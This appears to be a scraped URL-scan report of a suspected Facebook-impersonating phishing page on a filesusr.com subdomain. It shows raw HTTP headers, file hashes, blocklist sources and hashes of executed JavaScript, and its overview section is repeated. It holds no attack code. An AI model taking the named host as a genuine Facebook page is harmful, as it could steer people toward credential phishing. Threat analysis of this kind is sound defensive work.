C-XC9qsktkENdI6lWZp5RQjeEvrrFMUfBq1mA5dxEjRq5tkfL5Jsxw== via: 1.1 0005a84c2971ff4f5bbb79e7ebc622a8.cloudfront.net (CloudFront), 1.1 ee8246c5442dace7525c74f6a799bb46.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 22:04:55 GMT age: 37870 etag: "2bbcd6305b4da3204bf1c04b6db23d44cfc84fbb" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 4235 Md5: 30471179bd7cdeecea2fa4ea98701aef Sha1: 2bbcd6305b4da3204bf1c04b6db23d44cfc84fbb Sha256: 967e070aec3942c64cc6c4cfdc13d430825c9e5c26dbec5bb3d66237d5978dfc
GET /296x148/filters:format(jpeg):quality(60):no_upscale():strip_exif()/https%3A%2F%2Fs3.amazonaws.com%2Fpocket-curatedcorpusapi-prod-images%2Fb46b76b4-e585-46c3-bf03-5bfe9273000c.jpeg HTTP/1.1 Host: img-getpocket.cdn.mozilla.net User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Origin: null Connection: keep-alive Sec-Fetch-Dest: image Sec-Fetch-Mode: cors Sec-Fetch-Site: cross-site	URL: img-getpocket.cdn.mozilla.net/296x148/filters:format(jp (...) FQDN: img-getpocket.cdn.mozilla.net IP: 34.120.237.76 HASH: 8c25b9129fc01f6ffad911994e91436ab0026ed0b54568757a20ab7f92584467 34.120.237.76 HTTP/2 200 OK content-type: image/jpeg server: nginx content-length: 3332 x-amzn-requestid: fb6cb616-5b4d-4aaf-a891-50b4de8b6f95 x-xss-protection: 1; mode=block access-control-allow-origin: * strict-transport-security: max-age=63072000; includeSubdomains; preload x-frame-options: DENY content-security-policy: default-src 'none'; img-src 'self'; script-src 'self'; style-src 'self'; object-src 'none' x-amz-apigw-id: ZJ_6AGNYIAMFSHQ= x-content-type-options: nosniff x-amzn-trace-id: Root=1-6333e03f-377fe02d1cc7ad2b3a15ca1a;Sampled=0 x-amzn-remapped-date: Wed, 28 Sep 2022 05:48:47 GMT x-amz-cf-pop: SEA19-C2 x-cache: Miss from cloudfront x-amz-cf-id: nJJZxZlapt4k5988yU-V94pBBH2SmfSZ0Zb_oJXA07mppg0lF04wLg== via: 1.1 e5af640ced3aa8764b82c4bc3f7af38e.cloudfront.net (CloudFront), 1.1 d6b180eb367f7de26d67a9f3901b96a6.cloudfront.net (CloudFront), 1.1 google date: Wed, 28 Sep 2022 17:18:10 GMT age: 55075 etag: "4fc0699c763f67a2602b4b3f46b8b4013d2049c6" cache-control: max-age=3600,public,public alt-svc: clear X-Firefox-Spdy: h2 --- Additional Info --- Magic: JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 296x148, components 3\012- data Size: 3332 Md5: 6ac86079d2901fb11bfaff81d91bb2d2 Sha1: 4fc0699c763f67a2602b4b3f46b8b4013d2049c6 Sha256: 8c25b9129fc01f6ffad911994e91436ab0026ed0b54568757a20ab7f92584467
GET /security/hsts-pixel.gif HTTP/1.1 Host: facebook.com User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0 Accept: image/avif,image/webp,/ Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive Referer: http://facebookbeatrizz.filesusr.com/ Sec-Fetch-Dest: image Sec-Fetch-Mode: no-cors Sec-Fetch-Site: cross-site	URL: facebook.com/security/hsts-pixel.gif FQDN: facebook.com IP: 31.13.72.36 31.13.72.36 HTTP/2 200 OK content-type: image/gif vary: Accept-Encoding content-encoding: br x-fb-rlafr: 0 document-policy: force-load-at-top cross-origin-resource-policy: cross-origin cross-origin-opener-policy: same-origin-allow-popups pragma: no-cache cache-control: private, no-cache, no-store, must-revalidate expires: Sat, 01 Jan 2000 00:00:00 GMT x-content-type-options: nosniff x-xss-protection: 0 content-security-policy-report-only: default-src data: blob: 'self' https://.fbsbx.com 'unsafe-inline' .facebook.com 'unsafe-eval' .fbcdn.net;script-src .facebook.com .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src .fbcdn.net data: .facebook.com 'unsafe-inline';connect-src .facebook.com facebook.com .fbcdn.net wss://.facebook.com:* wss://.fbcdn.net attachment.fbsbx.com blob: .cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ .fbsbx.com;font-src data: .facebook.com .fbcdn.net .fbsbx.com;img-src .fbcdn.net .facebook.com data: https://.fbsbx.com facebook.com .cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: .oculuscdn.com;media-src .cdninstagram.com blob: .fbcdn.net .fbsbx.com www.facebook.com .facebook.com data:;frame-src .facebook.com .fbsbx.com fbsbx.com data: .fbcdn.net;worker-src blob: .facebook.com data:;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; content-security-policy: default-src data: blob: 'self' https://.fbsbx.com 'unsafe-inline' .facebook.com 'unsafe-eval' .fbcdn.net;script-src .facebook.com .fbcdn.net 'unsafe-inline' 'unsafe-eval' blob: data: 'self';style-src .fbcdn.net data: .facebook.com 'unsafe-inline';connect-src .facebook.com facebook.com .fbcdn.net wss://.facebook.com: wss://.fbcdn.net attachment.fbsbx.com blob: .cdninstagram.com 'self' wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ .fbsbx.com;font-src data: .facebook.com .fbcdn.net .fbsbx.com;img-src .fbcdn.net .facebook.com data: https://.fbsbx.com facebook.com .cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: .oculuscdn.com;media-src .cdninstagram.com blob: .fbcdn.net .fbsbx.com www.facebook.com .facebook.com data:;frame-src .facebook.com .fbsbx.com fbsbx.com data: .fbcdn.net;worker-src blob: .facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0; x-frame-options: DENY access-control-allow-origin: strict-transport-security: max-age=15552000; includeSubDomains x-fb-debug: gGdApqHLe7O+r6NMpGnDOhByDJLB6EmSQ1Sm91Bb8vZ5dNzJ/XBeXci4VYjBWLDKYMa8k/o7OWrSillz/QhPEg== date: Thu, 29 Sep 2022 08:36:04 GMT alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400 X-Firefox-Spdy: h2 --- Additional Info ---

Overview

Domain Summary (10)

Network Intrusion Detection Systems

Suricata /w Emerging Threats Pro

Blocklists

OpenPhish

PhishTank

Fortinet's Web Filter

mnemonic secure dns

Quad9 DNS

Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 34.102.176.152

Last 5 reports on ASN: GOOGLE

Last 5 reports on domain: filesusr.com

Last 5 reports with similar screenshot

JavaScript

Executed Scripts (17)

Executed Evals (0)

Executed Writes (7)

#1 JavaScript::Write (size: 53) - SHA256: c925181189c900d54d1ab93b2acadb6dbab2fb030365078587f971f4763ed835

#2 JavaScript::Write (size: 180) - SHA256: 9b256daad8f0c43be1f4733acce358242a53de861e333bd61b4ec71a777644dc

#3 JavaScript::Write (size: 55) - SHA256: da3b51a2028e01a9aa4c3ee986758af9eaeb266fd6a6263365c99c82d6a60fd3

#4 JavaScript::Write (size: 51) - SHA256: e5260e6a51903bec07911dd7f4436f0890a1d7382b59ddb9235ceeb0aa360405

#5 JavaScript::Write (size: 92) - SHA256: 78b9cf6f2d057a57f1e14e78cbcca8e93889691229863293b1518158d1b8482b

#6 JavaScript::Write (size: 38504) - SHA256: d1635980528e486318997156c0e9d6ce0fcf499109931260999606f2add8a33a

#7 JavaScript::Write (size: 299) - SHA256: dc9ab5b0af46a9b94d01b1159fa74edb629157fc15b55dddda1f2bc5c60fd9ac

HTTP Transactions (34)

Overview

Domain Summary (10)

Network Intrusion Detection Systemsinfo

Suricata /w Emerging Threats Pro

Blocklists

OpenPhish

PhishTank

Fortinet's Web Filter

mnemonic secure dns

Quad9 DNS

Files

No files detected

Recent reports on same IP/ASN/Domain/Screenshot

Last 5 reports on IP: 34.102.176.152

Last 5 reports on ASN: GOOGLE

Last 5 reports on domain: filesusr.com

Last 5 reports with similar screenshot

JavaScript

Executed Scripts (17)

Executed Evals (0)

Executed Writes (7)

#1 JavaScript::Write (size: 53) - SHA256: c925181189c900d54d1ab93b2acadb6dbab2fb030365078587f971f4763ed835

#2 JavaScript::Write (size: 180) - SHA256: 9b256daad8f0c43be1f4733acce358242a53de861e333bd61b4ec71a777644dc

#3 JavaScript::Write (size: 55) - SHA256: da3b51a2028e01a9aa4c3ee986758af9eaeb266fd6a6263365c99c82d6a60fd3

#4 JavaScript::Write (size: 51) - SHA256: e5260e6a51903bec07911dd7f4436f0890a1d7382b59ddb9235ceeb0aa360405

#5 JavaScript::Write (size: 92) - SHA256: 78b9cf6f2d057a57f1e14e78cbcca8e93889691229863293b1518158d1b8482b

#6 JavaScript::Write (size: 38504) - SHA256: d1635980528e486318997156c0e9d6ce0fcf499109931260999606f2add8a33a

#7 JavaScript::Write (size: 299) - SHA256: dc9ab5b0af46a9b94d01b1159fa74edb629157fc15b55dddda1f2bc5c60fd9ac

HTTP Transactions (34)

Network Intrusion Detection Systems